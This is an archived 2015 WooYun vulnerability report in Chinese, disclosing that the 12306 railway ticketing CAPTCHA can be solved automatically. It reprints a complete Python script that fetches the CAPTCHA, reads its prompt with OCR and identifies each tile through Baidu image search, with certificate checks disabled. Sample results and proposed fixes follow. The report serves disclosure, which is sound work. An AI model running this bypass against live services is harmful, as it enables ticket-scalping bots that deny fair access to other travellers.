当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0102178

漏洞标题:12306 最新验证码可被破解(可继续被应用于抢票软件)

相关厂商:12306

漏洞作者: zph

提交时间:2015-03-18 20:52

修复时间:2015-03-18 22:08

公开时间:2015-03-18 22:08

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-18: 细节已通知厂商并且等待厂商处理中
2015-03-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

这个没人报上来吗……这种奇葩验证码记得早就能被某公共服务识别了……(验证代码来源于第三方)

详细说明:

利用Google 图片(http://images.google.com)
写处代码(来自:https://github.com/andelf/fuck12306)

#!/usr/bin/python
# # FileName : fuck12306.py
# # Author : MaoMao Wang <[email protected]>
# # Created : Mon Mar 16 22:08:41 2015 by ShuYu Wang
# # Copyright : Feather (c) 2015
# # Description : fuck fuck 12306
# # Time-stamp: <2015-03-17 10:57:44 andelf>
from PIL import Image
from PIL import ImageFilter
import urllib
import urllib2
import re
import json
# hack CERTIFICATE_VERIFY_FAILED
# https://github.com/mtschirs/quizduellapi/issues/2
import ssl
if hasattr(ssl, '_create_unverified_context'):
ssl._create_default_https_context = ssl._create_unverified_context
UA = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36"
pic_url = "https://kyfw.12306.cn/otn/passcodeNew/getPassCodeNew?module=login&rand=sjrand&0.21191171556711197"
def get_img():
resp = urllib.urlopen(pic_url)
raw = resp.read()
with open("./tmp.jpg", 'wb') as fp:
fp.write(raw)
return Image.open("./tmp.jpg")
def get_sub_img(im, x, y):
assert 0 <= x <= 3
assert 0 <= y <= 2
WITH = HEIGHT = 68
left = 5 + (67 + 5) * x
top = 41 + (67 + 5) * y
right = left + 67
bottom = top + 67
return im.crop((left, top, right, bottom))
def baidu_stu_lookup(im):
url = "http://stu.baidu.com/n/image?fr=html5&needRawImageUrl=true&id=WU_FILE_0&name=233.png&type=image%2Fpng&lastModifiedDate=Mon+Mar+16+2015+20%3A49%3A11+GMT%2B0800+(CST)&size="
im.save("./query_temp_img.png")
raw = open("./query_temp_img.png", 'rb').read()
url = url + str(len(raw))
req = urllib2.Request(url, raw, {'Content-Type':'image/png', 'User-Agent':UA})
resp = urllib2.urlopen(req)
resp_url = resp.read() # return a pure url
url = "http://stu.baidu.com/n/searchpc?queryImageUrl=" + urllib.quote(resp_url)
req = urllib2.Request(url, headers={'User-Agent':UA})
resp = urllib2.urlopen(req)
html = resp.read()
return baidu_stu_html_extract(html)
def baidu_stu_html_extract(html):
#pattern = re.compile(r'<script type="text/javascript">(.*?)</script>', re.DOTALL | re.MULTILINE)
pattern = re.compile(r"keywords:'(.*?)'")
matches = pattern.findall(html)
if not matches:
return '[UNKNOWN]'
json_str = matches[0]
json_str = json_str.replace('\\x22', '"').replace('\\\\', '\\')
#print json_str
result = [item['keyword'] for item in json.loads(json_str)]
return '|'.join(result) if result else '[UNKNOWN]'
def ocr_question_extract(im):
# [email protected]:madmaze/pytesseract.git
global pytesseract
try:
import pytesseract
except:
print "[ERROR] pytesseract not installed"
return
im = im.crop((127, 3, 260, 22))
im = pre_ocr_processing(im)
# im.show()
return pytesseract.image_to_string(im, lang='chi_sim').strip()
def pre_ocr_processing(im):
im = im.convert("RGB")
width, height = im.size
white = im.filter(ImageFilter.BLUR).filter(ImageFilter.MaxFilter(23))
grey = im.convert('L')
impix = im.load()
whitepix = white.load()
greypix = grey.load()
for y in range(height):
for x in range(width):
greypix[x,y] = min(255, max(255 + impix[x,y][0] - whitepix[x,y][0],
255 + impix[x,y][1] - whitepix[x,y][1],
255 + impix[x,y][2] - whitepix[x,y][2]))
new_im = grey.copy()
binarize(new_im, 150)
return new_im
def binarize(im, thresh=120):
assert 0 < thresh < 255
assert im.mode == 'L'
w, h = im.size
for y in xrange(0, h):
for x in xrange(0, w):
if im.getpixel((x,y)) < thresh:
im.putpixel((x,y), 0)
else:
im.putpixel((x,y), 255)
if __name__ == '__main__':
im = get_img()
#im = Image.open("./tmp.jpg")
print 'OCR Question:', ocr_question_extract(im)
for y in range(2):
for x in range(4):
im2 = get_sub_img(im, x, y)
result = baidu_stu_lookup(im2)
print (y,x), result


12306验证码即可被完爆

漏洞证明:

1.jpg


2.png


3.jpg


> 结果
(0, 0) 苹果充电器
(0, 1) 医师资格证|证件翻拍
(0, 2) 手机|手机皮套
(0, 3) 油炸薯条|炸暑条|双人
(1, 0) 手机套|苹果手机套|手机配件
(1, 1) 砂积石
(1, 2) [UNKOWN]
(1, 3) 波导|可转穿衣镜|手机


4.jpg


>
(0, 0) 靴|保温杯
(0, 1) 二粒小麦|刷子|成片种植
(0, 2) 香辣酱|瓶装调料|果酱
(0, 3) [UNKOWN]
(1, 0) 柚子|圆形果类
(1, 1) 雪饼
(1, 2) 李锦记|香辣酱|调料
(1, 3) 素菜

修复方案:

1. 不要用这种奇葩验证码……这种验证码太太诡异,有时会挡住一些正常使用的用户。
2. 既然抢票软件是全自动的,不如在图像验证码的前提下,加个二次验证?短信验证码?邮件确认?
更多方案请自行发挥,呵呵呵呵呵呵呵……

版权声明:转载请注明来源 zph@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-03-18 22:08

厂商回复:

两个单选图片的答案,或者不是答案的相似图片多于答案图片。

最新状态:

暂无